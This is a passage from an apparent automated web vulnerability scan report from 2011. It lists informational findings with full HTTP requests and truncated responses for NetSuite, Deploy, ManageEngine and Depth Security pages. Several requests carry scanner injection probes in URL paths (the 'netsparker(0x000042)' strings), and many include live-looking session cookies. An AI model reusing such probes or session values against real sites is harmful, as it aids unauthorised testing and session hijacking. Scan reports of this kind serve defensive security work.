Host: checkout.netsuite.com
Connection: keep-alive
Referer: https://checkout.netsuite.com/s.nl?c=438708&sc=4&whence=&n=1&ext=T&redirect_count=1&did_javascript_redirect=T
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mbox=check#true#1303741608|session#1303736347554-914602#1303743408|PC#1303736347554-914602.17#1304951149; JSESSIONID=1J6WN1GLD7YF97mg4NnnrJtMTLyyBTLW5SC2xnzp2bL1BkKjmqzhQtgw4LDqyWffYxnJ5rLVX4VWGGxBLnQ6WdW126sPpQ9GcKxyvKTvtWBTh6tB9XplC3VFTz911rXl!1384455285; NLVisitorId=rcHW8415AZeYvnmq; NLShopperId=rcHW8415AciYvvMS; NS_VER=2011.1.0

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 14:25:55 GMT
Server: Apache
Cache-Control: max-age=604800
Content-Length: 20200
Content-Disposition: inline;filename="mbox.js"
NS_RTIMER_COMPOSITE: -260603124:616363742D6A6176613032372E7376616C652E6E65746C65646765722E636F6D:80
NLCacheNote: FromMediaCache=T
X-Powered-By: Servlet/2.5 JSP/2.1
P3P: CP="CAO PSAa OUR BUS PUR"
Vary: User-Agent
Keep-Alive: timeout=10, max=994
Connection: Keep-Alive
Content-Type: application/octet-stream; charset=UTF-8

var mboxCopyright = "&copy; 1996-2008. Omniture, Inc. All rights reserved.";mboxUrlBuilder = function(a, b) { this.a = a; this.b = b; this.c = new Array(); this.d = function(e) { return e; }; this.f =
...[SNIP]...

29.3. https://checkout.netsuite.com/c.438708/js/lib/mootools-1.2.4-core-yc.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://checkout.netsuite.com
Path:   /c.438708/js/lib/mootools-1.2.4-core-yc.js

Request

GET /c.438708/js/lib/mootools-1.2.4-core-yc.js HTTP/1.1
Host: checkout.netsuite.com
Connection: keep-alive
Referer: https://checkout.netsuite.com/s.nl?c=438708&sc=4&whence=&n=1&ext=T&redirect_count=1&did_javascript_redirect=T
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mbox=check#true#1303741608|session#1303736347554-914602#1303743408|PC#1303736347554-914602.17#1304951149; JSESSIONID=1J6WN1GLD7YF97mg4NnnrJtMTLyyBTLW5SC2xnzp2bL1BkKjmqzhQtgw4LDqyWffYxnJ5rLVX4VWGGxBLnQ6WdW126sPpQ9GcKxyvKTvtWBTh6tB9XplC3VFTz911rXl!1384455285; NLVisitorId=rcHW8415AZeYvnmq; NLShopperId=rcHW8415AciYvvMS; NS_VER=2011.1.0

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 14:25:55 GMT
Server: Apache
Cache-Control: max-age=604800
Content-Length: 66867
Content-Disposition: inline;filename="mootools-1.2.4-core-yc.js"
NS_RTIMER_COMPOSITE: -1256659311:616363742D6A6176613032372E7376616C652E6E65746C65646765722E636F6D:80
NLCacheNote: FromMediaCache=T
X-Powered-By: Servlet/2.5 JSP/2.1
P3P: CP="CAO PSAa OUR BUS PUR"
Vary: User-Agent
Keep-Alive: timeout=10, max=970
Connection: Keep-Alive
Content-Type: application/octet-stream; charset=UTF-8

//MooTools, <http://mootools.net>, My Object Oriented (JavaScript) Tools. Copyright (c) 2006-2009 Valerio Proietti, <http://mad4milk.net>, MIT Style License.

var MooTools={version:"1.2.4",build:"0d91
...[SNIP]...

29.4. https://checkout.netsuite.com/empty.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://checkout.netsuite.com
Path:   /empty.html

Request

GET /empty.html HTTP/1.1
Host: checkout.netsuite.com
Connection: keep-alive
Referer: https://checkout.netsuite.com/s.nl/c.438708/n.1/sc.4/.f?ext=T&login=T&reset=T&newcust=T&noopt=T
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=1J6WN1GLD7YF97mg4NnnrJtMTLyyBTLW5SC2xnzp2bL1BkKjmqzhQtgw4LDqyWffYxnJ5rLVX4VWGGxBLnQ6WdW126sPpQ9GcKxyvKTvtWBTh6tB9XplC3VFTz911rXl!1384455285; NLVisitorId=rcHW8415AZeYvnmq; NLShopperId=rcHW8415AciYvvMS; NS_VER=2011.1.0; mbox=session#1303736347554-914602#1303743995|PC#1303736347554-914602.17#1304951735|check#true#1303742195

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 14:35:25 GMT
Server: Apache
Cache-Control: private
Cache-Control: max-age=56400
Accept-Ranges: bytes
Content-Length: 168
Expires: Tue, 26 Apr 2011 06:15:25 GMT
Last-Modified: Thu, 21 Apr 2011 07:00:00 GMT
NS_RTIMER_COMPOSITE: -1598180205:616363742D6A6176613032372E7376616C652E6E65746C65646765722E636F6D:80
X-Powered-By: Servlet/2.5 JSP/2.1
P3P: CP="CAO PSAa OUR BUS PUR"
Vary: User-Agent
Keep-Alive: timeout=10, max=999
Connection: Keep-Alive
Content-Type: text/html

<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
<META NAME="ROBOTS" CONTENT="NOINDEX, NOFOLLOW">
</head>
<body>
</body>
</html>

29.5. https://checkout.netsuite.com/pages/portal/page_not_found.jsp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://checkout.netsuite.com
Path:   /pages/portal/page_not_found.jsp

Request

HEAD /pages/portal/page_not_found.jsp?internal=F HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: checkout.netsuite.com
Cookie: JSESSIONID=dr9LN1Gcsnv0hQn9pSF9dZtY69V5GT6wWLx5pbn5zqyTN5K0By5hSnyCLpkp16zsn8jTQzcvVTNZSwMD4mG6WZmpmLChGK6FncvhBpQv6KGffqpM2fHyGlYVz2GpQM2Y!-979559123; NLVisitorId=rcHW8495AYoCDqLY; NLShopperId=rcHW8495AXICDie_; NS_VER=2011.1.0
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 14:26:41 GMT
Server: Apache
NS_RTIMER_COMPOSITE: 2000605877:616363742D6A6176613032302E7376616C652E6E65746C65646765722E636F6D:80
X-Powered-By: Servlet/2.5 JSP/2.1
P3P: CP="CAO PSAa OUR BUS PUR"
Vary: User-Agent
Content-Type: text/html; charset=UTF-8
Content-Length: 0


29.6. https://checkout.netsuite.com/robots.txt  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://checkout.netsuite.com
Path:   /robots.txt

Request

GET /robots.txt HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: checkout.netsuite.com
Cookie: JSESSIONID=dr9LN1Gcsnv0hQn9pSF9dZtY69V5GT6wWLx5pbn5zqyTN5K0By5hSnyCLpkp16zsn8jTQzcvVTNZSwMD4mG6WZmpmLChGK6FncvhBpQv6KGffqpM2fHyGlYVz2GpQM2Y!-979559123; NLVisitorId=rcHW8495AYoCDqLY; NLShopperId=rcHW8495AXICDie_; NS_VER=2011.1.0
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 14:26:41 GMT
Server: Apache
Accept-Ranges: bytes
Content-Length: 103
Last-Modified: Sat, 23 Apr 2011 00:28:30 GMT
NS_RTIMER_COMPOSITE: -1592275309:616363742D6A6176613032302E7376616C652E6E65746C65646765722E636F6D:80
X-Powered-By: Servlet/2.5 JSP/2.1
P3P: CP="CAO PSAa OUR BUS PUR"
Vary: User-Agent
Content-Type: text/plain

# Allow all robots to spider everything by disallowing nothing

User-agent: *
Crawl-Delay: 20
Disallow:

29.7. https://checkout.netsuite.com/s.nl  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://checkout.netsuite.com
Path:   /s.nl

Request

GET /s.nl?c=438708&sc=4NS_NO&whence=3&n=1&ext=T&redirect_count=1&did_javascript_redirect=T HTTP/1.1
Referer: https://checkout.netsuite.com/s.nl?c=438708&sc=4&whence=&n=1&ext=T
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: checkout.netsuite.com
Cookie: JSESSIONID=bqgtN1FCvmPZxcX2b3nD1qst0hJBbncQpX4mKyTQTv3pKCPvkLf29Tn7kwyJ26VCKpZhYV7XrhkXjJj2Gpvsp7WCw27FDpnZHWQvTGR8X2G2TXlJDxhnb90YJrRhDJ1B!-979559123; NLVisitorId=rcHW8495AYoCDqLY; NLShopperId=rcHW8495AXICDie_; NS_VER=2011.1.0
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 14:28:52 GMT
Server: Apache
Expires: 0
Last-Modified: Mon, 25 Apr 2011 14:28:51 GMT
NS_RTIMER_COMPOSITE: -368823693:616363742D6A6176613032302E7376616C652E6E65746C65646765722E636F6D:80
Set-Cookie: NLShopperId=rcHW8495AXICDie_; domain=checkout.netsuite.com; expires=Monday, 02-May-2011 14:28:53 GMT; path=/
X-Powered-By: Servlet/2.5 JSP/2.1
P3P: CP="CAO PSAa OUR BUS PUR"
Vary: User-Agent
Content-Type: text/html; charset=utf-8
Content-Length: 26741


<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<title>Checkout - ESET North America</title>


<script type="text/javascript">
var gaJsHost = (("https:" == document
...[SNIP]...

29.8. https://customer.kronos.com/Default.asp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://customer.kronos.com
Path:   /Default.asp

Request

HEAD /Default.asp HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: customer.kronos.com
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 13:39:37 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 17287
Content-Type: text/html
Expires: Tue, 01 Jan 1980 06:00:00 GMT
Set-Cookie: ICRedirect=Url=; path=/
Set-Cookie: KronosCust=LogIn=false; path=/
Set-Cookie: ASPSESSIONIDQASQRRDR=GKMMPBCAFDPKJBLLDIIBOHPD; path=/
Cache-control: private


29.9. https://employer.unicru.com/asp/home/login.asp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://employer.unicru.com
Path:   /asp/home/login.asp

Request

GET /asp/home/login.asp HTTP/1.1
Host: employer.unicru.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 13:39:28 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
webservername: 42vm
Content-Length: 3592
Content-Type: text/html
Set-Cookie: ASPSESSIONIDSSRCBTSB=MCAKPIJCNPCBKCIMDMJHBHMD; path=/
Cache-control: private
Set-Cookie: KTMDWestLB=993264394.20736.0000; path=/


<html>
   <head>
       <title>Unicru: Employer's Desktop Log In</title>
       <style type="text/css">
       <!--
       .content {FONT-WEIGHT: normal; FONT-SIZE: 11px; COLOR: #666666; FONT-FAMILY: verdana, san-
...[SNIP]...

29.10. https://forms.netsuite.com/pages/portal/page_not_found.jsp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://forms.netsuite.com
Path:   /pages/portal/page_not_found.jsp

Request

GET /pages/portal/page_not_found.jsp?internal=F HTTP/1.1
Host: forms.netsuite.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: bn_u=6923519460848807096; mbox=session#1303736347554-914602#1303744342|PC#1303736347554-914602.17#1366814482|check#true#1303742542

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 15:14:16 GMT
Server: Apache
NS_RTIMER_COMPOSITE: -354339471:616363742D6A6176613035312E7376616C652E6E65746C65646765722E636F6D:80
X-Powered-By: Servlet/2.5 JSP/2.1
P3P: CP="CAO PSAa OUR BUS PUR"
Vary: User-Agent
Keep-Alive: timeout=10, max=953
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
Content-Length: 11320


<html><head><title>NetSuite | Page Not Found</title>
<meta name="robots" content="noindex,nofollow">
<link rel="STYLESHEET" type="text/css" href="/pages/portal/css/main.css">
</head>
<body bgcolor
...[SNIP]...

29.11. https://hourly.deploy.com/hmc/report/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://hourly.deploy.com
Path:   /hmc/report/

Request

GET /hmc/report/ HTTP/1.1
Host: hourly.deploy.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 13:39:30 GMT
Server: Apache/2.0.46 (Red Hat)
Set-Cookie: JSESSIONID=d8308cb242bf2b615f7a;path=/
Set-Cookie: CFAUTHORIZATION_hmc5_prod_delroy=;expires=Sun, 25-Apr-2010 13:39:30 GMT;path=/
Set-Cookie: CFAUTHORIZATION_hmc5_prod_delroy=;expires=Sun, 25-Apr-2010 13:39:30 GMT;path=/
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Mon, 25 Apr 2011 13:39:30 GMT
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 4789


                                                                                                                                                                                                                                                                                                                                                                                                                       
...[SNIP]...

29.12. https://hourly.deploy.com/hmc/report/index.cfm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://hourly.deploy.com
Path:   /hmc/report/index.cfm

Request

GET /hmc/report/index.cfm HTTP/1.1
Referer: https://hourly.deploy.com/hmc/report/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hourly.deploy.com
Cookie: JSESSIONID=3e30aecfc2d1617d7f5d
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Mon, 25 Apr 2011 13:41:28 GMT
Server: Apache/2.0.46 (Red Hat)
Set-Cookie: CFAUTHORIZATION_hmc5_prod_delroy=;expires=Sun, 25-Apr-2010 13:41:28 GMT;path=/
Set-Cookie: CFAUTHORIZATION_hmc5_prod_delroy=;expires=Sun, 25-Apr-2010 13:41:28 GMT;path=/
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Mon, 25 Apr 2011 13:41:28 GMT
Connection: close
Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                                                                                                                                                                                                                       
...[SNIP]...

29.13. https://hourly.deploy.com/hmc/report/index.cfm/%22ns=%22netsparker(0x000042)  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://hourly.deploy.com
Path:   /hmc/report/index.cfm/%22ns=%22netsparker(0x000042)

Request

GET /hmc/report/index.cfm/%22ns=%22netsparker(0x000042) HTTP/1.1
Referer: https://hourly.deploy.com/hmc/report/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hourly.deploy.com
Cookie: JSESSIONID=3e306b860232c5826104
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Mon, 25 Apr 2011 13:41:52 GMT
Server: Apache/2.0.46 (Red Hat)
Set-Cookie: CFAUTHORIZATION_hmc5_prod_delroy=;expires=Sun, 25-Apr-2010 13:41:52 GMT;path=/
Set-Cookie: CFAUTHORIZATION_hmc5_prod_delroy=;expires=Sun, 25-Apr-2010 13:41:52 GMT;path=/
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Mon, 25 Apr 2011 13:41:52 GMT
Connection: close
Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                                                                                                                                                                                                                       
...[SNIP]...

29.14. https://hourly.deploy.com/hmc/report/index.cfm/%2522ns%253D%2522netsparker%25280x000048%2529)  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://hourly.deploy.com
Path:   /hmc/report/index.cfm/%2522ns%253D%2522netsparker%25280x000048%2529)

Request

GET /hmc/report/index.cfm/%2522ns%253D%2522netsparker%25280x000048%2529) HTTP/1.1
Referer: https://hourly.deploy.com/hmc/report/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hourly.deploy.com
Cookie: JSESSIONID=3e306b860232c5826104
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Mon, 25 Apr 2011 13:41:55 GMT
Server: Apache/2.0.46 (Red Hat)
Set-Cookie: CFAUTHORIZATION_hmc5_prod_delroy=;expires=Sun, 25-Apr-2010 13:41:55 GMT;path=/
Set-Cookie: CFAUTHORIZATION_hmc5_prod_delroy=;expires=Sun, 25-Apr-2010 13:41:55 GMT;path=/
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Mon, 25 Apr 2011 13:41:55 GMT
Connection: close
Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                                                                                                                                                                                                                       
...[SNIP]...

29.15. https://store.manageengine.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://store.manageengine.com
Path:   /

Request

GET / HTTP/1.1
Host: store.manageengine.com
Connection: keep-alive
Referer: http://www.manageengine.com/products/applications_manager/application-performance-management.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=208542606.1303732848.2.2.utmgclid=CL-9_6TPt6gCFQTe4AodlRiOCw|utmccn=(not%20set)|utmcmd=(not%20set); __utma=208542606.1253035426.1303526945.1303526945.1303732848.2; __utmc=208542606; __utmb=208542606.10.10.1303732848

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 12:13:43 GMT
Server: Apache
Last-Modified: Mon, 25 Apr 2011 10:56:23 GMT
ETag: "4d5bdaa-12c1f-4a1bc0eea43c0"
Accept-Ranges: bytes
Cache-Control: max-age=31536000
Expires: Tue, 24 Apr 2012 12:13:43 GMT
Vary: Accept-Encoding
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
Content-Length: 76831

<html><!-- InstanceBegin template="/Templates/store.dwt" codeOutsideHTMLIsLocked="false" -->
<head>
<!-- InstanceBeginEditable name="doctitle" -->
<title>ManageEngine Store</title>
<!-- InstanceEndEdi
...[SNIP]...

29.16. https://store.manageengine.com/service-desk/index.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://store.manageengine.com
Path:   /service-desk/index.html

Request

GET /service-desk/index.html HTTP/1.1
Host: store.manageengine.com
Connection: keep-alive
Referer: https://store.manageengine.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=208542606.1303732848.2.2.utmgclid=CL-9_6TPt6gCFQTe4AodlRiOCw|utmccn=(not%20set)|utmcmd=(not%20set); __utma=208542606.1253035426.1303526945.1303526945.1303732848.2; __utmc=208542606; __utmb=208542606.13.10.1303732848

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 12:14:05 GMT
Server: Apache
Last-Modified: Thu, 21 Apr 2011 11:59:05 GMT
ETag: "4d5be12-745c-4a16c77c85440"
Accept-Ranges: bytes
Cache-Control: max-age=31536000
Expires: Tue, 24 Apr 2012 12:14:05 GMT
Vary: Accept-Encoding
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
Content-Length: 29788

<html><!-- InstanceBegin template="/Templates/store.dwt" codeOutsideHTMLIsLocked="false" -->
<head>
<!-- InstanceBeginEditable name="doctitle" -->
<title>ManageEngine ServiceDesk Plus tore</title>
<!-
...[SNIP]...

29.17. https://system.netsuite.com/pages/customerlogin.jsp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://system.netsuite.com
Path:   /pages/customerlogin.jsp

Request

GET /pages/customerlogin.jsp HTTP/1.1
Host: system.netsuite.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: bn_u=6923519460848807096; mbox=session#1303736347554-914602#1303744342|PC#1303736347554-914602.17#1366814482|check#true#1303742542

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 15:14:13 GMT
Server: Apache
NS_RTIMER_COMPOSITE: 2015151527:616363742D6A6176613036392E7376616C652E6E65746C65646765722E636F6D:80
X-Powered-By: Servlet/2.5 JSP/2.1
P3P: CP="CAO PSAa OUR BUS PUR"
Vary: User-Agent
Keep-Alive: timeout=10, max=661
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
Content-Length: 49795


<!-- hosted from '/US/' on a.j69.sv running 2010.2.0.159 -->
<html>
<head>
<title>NetSuite - Customer Login</title>
<meta name="description" content="NetSuite provides a login page for
...[SNIP]...

29.18. https://www.depthsecurity.com/company.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.depthsecurity.com
Path:   /company.aspx

Request

GET /company.aspx HTTP/1.1
Host: www.depthsecurity.com
Connection: keep-alive
Referer: https://www.depthsecurity.com/contact-us.aspx
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=5781286.1303735972.2.2.utmgclid=CKbh46DPt6gCFcQSNAodRgFuBQ|utmccn=(not%20set)|utmcmd=(not%20set); __utma=5781286.184354172.1303732840.1303732840.1303735972.2; __utmc=5781286

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 5736
Content-Type: text/html; charset=utf-8
Server: DepthServ-FU/8.0
X-Powered-By: DepthScript.fu
Date: Mon, 25 Apr 2011 15:13:40 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<html>
<head>
<tit
...[SNIP]...

29.19. https://www.depthsecurity.com/contact-us.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.depthsecurity.com
Path:   /contact-us.aspx

Request

GET /contact-us.aspx HTTP/1.1
Host: www.depthsecurity.com
Connection: keep-alive
Referer: http://www.depthsecurity.com/issa-kc-12-2009-presentation.aspx
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=5781286.1303735972.2.2.utmgclid=CKbh46DPt6gCFcQSNAodRgFuBQ|utmccn=(not%20set)|utmcmd=(not%20set); __utma=5781286.184354172.1303732840.1303732840.1303735972.2; __utmc=5781286; __utmb=5781286.2.10.1303735972

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 11987
Content-Type: text/html; charset=utf-8
Server: DepthServ-FU/8.0
X-Powered-By: DepthScript.fu
Date: Mon, 25 Apr 2011 13:10:51 GMT


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<hea
...[SNIP]...

29.20. https://www.depthsecurity.com/professional-services.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.depthsecurity.com
Path:   /professional-services.aspx

Request

GET /professional-services.aspx HTTP/1.1
Host: www.depthsecurity.com
Connection: keep-alive
Referer: https://www.depthsecurity.com/services.aspx
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=5781286.1303735972.2.2.utmgclid=CKbh46DPt6gCFcQSNAodRgFuBQ|utmccn=(not%20set)|utmcmd=(not%20set); __utma=5781286.184354172.1303732840.1303732840.1303735972.2; __utmc=5781286

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 6397
Content-Type: text/html; charset=utf-8
Server: DepthServ-FU/8.0
X-Powered-By: DepthScript.fu
Date: Mon, 25 Apr 2011 15:13:40 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<html>
<head>
<tit
...[SNIP]...

29.21. https://www.depthsecurity.com/services.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.depthsecurity.com
Path:   /services.aspx

Request

GET /services.aspx HTTP/1.1
Host: www.depthsecurity.com
Connection: keep-alive
Referer: https://www.depthsecurity.com/company.aspx
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=5781286.1303735972.2.2.utmgclid=CKbh46DPt6gCFcQSNAodRgFuBQ|utmccn=(not%20set)|utmcmd=(not%20set); __utma=5781286.184354172.1303732840.1303732840.1303735972.2; __utmc=5781286

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 6794
Content-Type: text/html; charset=utf-8
Server: DepthServ-FU/8.0
X-Powered-By: DepthScript.fu
Date: Mon, 25 Apr 2011 15:13:40 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
